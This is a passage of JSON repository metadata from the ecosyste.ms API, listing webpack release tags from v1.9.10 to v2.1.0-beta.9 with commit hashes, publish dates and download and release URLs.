rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecos